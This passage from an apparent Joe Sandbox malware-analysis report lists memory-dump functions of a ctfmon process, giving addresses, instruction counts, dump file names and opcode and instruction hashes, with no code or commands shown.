                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9086e0dd96e481c9c50a7eea49c8f89c81e8241d47e2d101ccc4a891127a37d
                                                    • Instruction ID: a29696a42daf9683beca3ecac1cb3457bf5d8776a13b07feddc701e9797a87de
                                                    • Opcode Fuzzy Hash: e9086e0dd96e481c9c50a7eea49c8f89c81e8241d47e2d101ccc4a891127a37d
                                                    • Instruction Fuzzy Hash: 59F0EC30A1494D8FDB94EF68C488BE977E0FF28305F0041A6E81CC71A5CB30E5A0CB80
                                                    Function 00007FFD9C1D1402 Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b0309836015f15174a60e6eee3fbc89aa6f6ccfc04e1548d080504013516a06
                                                    • Instruction ID: 37735a37c73d378ef7ed07a84367e626e800b0a240d53f260cf2910540499c85
                                                    • Opcode Fuzzy Hash: 2b0309836015f15174a60e6eee3fbc89aa6f6ccfc04e1548d080504013516a06
                                                    • Instruction Fuzzy Hash: E0F0C83294E3C69FD3168FB088614E53FB4AF43211F2401FAD48A870A2D76D1656C762
                                                    Function 00007FFD9C1D10C3 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                    • Instruction ID: 7c19a9ab5b9f8620aa5738e60adb201124ab84257a78ac954b717f71c882271c
                                                    • Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                    • Instruction Fuzzy Hash: C4010074A1992D8FDFA8DB48C8A4BA8B7B1FB69301F1042D9C00EE3250DB319A84CF05
                                                    Function 00007FFD9C412839 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 23c8cbdff8a2bb4944ec6f846205c0e8548194689d6eb5c0e553c45bc80e3029
                                                    • Instruction ID: 2146103d82f66d846e809dc8e25f44e06405fa52b87f62025f2494ebbdfffe57
                                                    • Opcode Fuzzy Hash: 23c8cbdff8a2bb4944ec6f846205c0e8548194689d6eb5c0e553c45bc80e3029
                                                    • Instruction Fuzzy Hash: 07F06D3090A6C98FDB62AF64C8696997FB0FF15304F0505EAE458C61A3EA78A554CB41
                                                    Function 00007FFD9C417B88 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce634f6aad9be5587e31c62647311c0769f202efc7872fa24570c88208d82aab
                                                    • Instruction ID: 98cff4c78f6dfabedb0c67cdd1b1d1328002d6dd79656b57d3d930eb2a0b3011
                                                    • Opcode Fuzzy Hash: ce634f6aad9be5587e31c62647311c0769f202efc7872fa24570c88208d82aab
                                                    • Instruction Fuzzy Hash: D4F0F970A4461E8FEB68EB90C864AFCB7B1FB58354F000169C009E3691DF386A408B54
                                                    Function 00007FFD9BAF0B76 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6d853ea211e379c9d92108c48c31e764de35dfbe983604893a7c8d369127979e
                                                    • Instruction ID: ebcdacb3daeb9a4ddcfd672a5fd167962fd166c1bcb17dab5aff5f4beeee33e1
                                                    • Opcode Fuzzy Hash: 6d853ea211e379c9d92108c48c31e764de35dfbe983604893a7c8d369127979e
                                                    • Instruction Fuzzy Hash: 63F0DA70F0A39E8FEBB0DFE488543FCBBA1AF04744F620475D449D61A5DAB866449704
                                                    Function 00007FFD9C413D40 Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f2d085e057398c40cf7c490297a700ebfbc0531b0f313c0045ab48f9952b1aa7
                                                    • Instruction ID: 7ceed550eeb97724a58f27b891837c2e01fc14b9af0219f89a85795c3f5c2e17
                                                    • Opcode Fuzzy Hash: f2d085e057398c40cf7c490297a700ebfbc0531b0f313c0045ab48f9952b1aa7
                                                    • Instruction Fuzzy Hash: 2EE04F30A0494E8FDB54EF54D9012EA77B0FF58304F000525E85CC2185CA74A664CBC1
                                                    Function 00007FFD9C1DBA55 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5fbe7a750a5e6f2c953edbd7fab4cc7173efdaf208b3c8ffe21b81f262c560c
                                                    • Instruction ID: 0ee5950123da292fb5cfa0b44b70681f800b4cda204a60b73bbcfc2099b1117b
                                                    • Opcode Fuzzy Hash: e5fbe7a750a5e6f2c953edbd7fab4cc7173efdaf208b3c8ffe21b81f262c560c
                                                    • Instruction Fuzzy Hash: 22E0D836D1D3898BD771CB9084650EC7F70BF00380F1402E7E40A5A2D2EB2956489642
                                                    Function 00007FFD9C411480 Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2993352358.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c410000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f4d68e76e02bdb19497f6a6f5ec291a13edf05229271d7dc3ed5d3deffc28415
                                                    • Instruction ID: a9dc62288515d24e0b65caa5b741f6f0edd45b6b871b6ff76a86c14502bea339
                                                    • Opcode Fuzzy Hash: f4d68e76e02bdb19497f6a6f5ec291a13edf05229271d7dc3ed5d3deffc28415
                                                    • Instruction Fuzzy Hash: 8BE0E630E5554DAAEB50FBB485596FD77F4FF18308F404876E41DD2191DA346294CB41
                                                    Function 00007FFD9C1DE227 Relevance: .0, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2c6402dcd5610092e5edfd5ec823b54f2bbd2676520f37d38f42817b1682fe5d
                                                    • Instruction ID: 077bb775a5986a90e91e96dd6f289b2f6dbb8e4c4c1e3234f644b1e7a5793930
                                                    • Opcode Fuzzy Hash: 2c6402dcd5610092e5edfd5ec823b54f2bbd2676520f37d38f42817b1682fe5d
                                                    • Instruction Fuzzy Hash: E6E08C02F0D2C34BE77202B448704387BA08F073C67090BB9C1869A2C3E9583804931A
                                                    Function 00007FFD9BAF0316 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3cb8a577312b785fbd8e0db3f97cedbf9eaadad0b9aa1f73666a4ad57fbb4d06
                                                    • Instruction ID: f9717349fa336a11aba78534043a4f70fbd30066209fe26079abebea37bc7b18
                                                    • Opcode Fuzzy Hash: 3cb8a577312b785fbd8e0db3f97cedbf9eaadad0b9aa1f73666a4ad57fbb4d06
                                                    • Instruction Fuzzy Hash: 14E08672F1861B4FFB289F94CC756FD2BA1FF5424CF100135D119562D6DE3839014644
                                                    Function 00007FFD9C1DECFB Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                    • Instruction ID: 94801eac193d7e2443a07eab58621fd76a2fa920f9597cf1c460af62587603d8
                                                    • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                    • Instruction Fuzzy Hash: 15D0CA26F0EA5785F2394AC1807023EA9B18F013C3E36437EC09FA18C1EE2CB801661A
                                                    Function 00007FFD9C1D2BFB Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40fd71155bf8aa623ff26884ea2e8547758b10ad2c9d9e98c40479dca39f208e
                                                    • Instruction ID: 1b002209ef7be5c419bf5a4c7633c93049b3921b0daab37d9ff689815da717cd
                                                    • Opcode Fuzzy Hash: 40fd71155bf8aa623ff26884ea2e8547758b10ad2c9d9e98c40479dca39f208e
                                                    • Instruction Fuzzy Hash: 20D0A902F0C05784F33A0682817023D11B05F01380E30033DD07FA08C3EC1C7C002A09
                                                    Function 00007FFD9C1D210F Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2988781817.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9c1d0000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e47307fefa87b0124977d75b241c853d96b4c827e4d892cbccbe62300d9df05e
                                                    • Instruction ID: bd8a08c3d415329ffad2599fd48d4140e4b05552207322ed3645b2177a9d139a
                                                    • Opcode Fuzzy Hash: e47307fefa87b0124977d75b241c853d96b4c827e4d892cbccbe62300d9df05e
                                                    • Instruction Fuzzy Hash: D5C04C15F0D2475BE73656F448B213C16A10F4B2447554771E26A9A1D3E8587C445255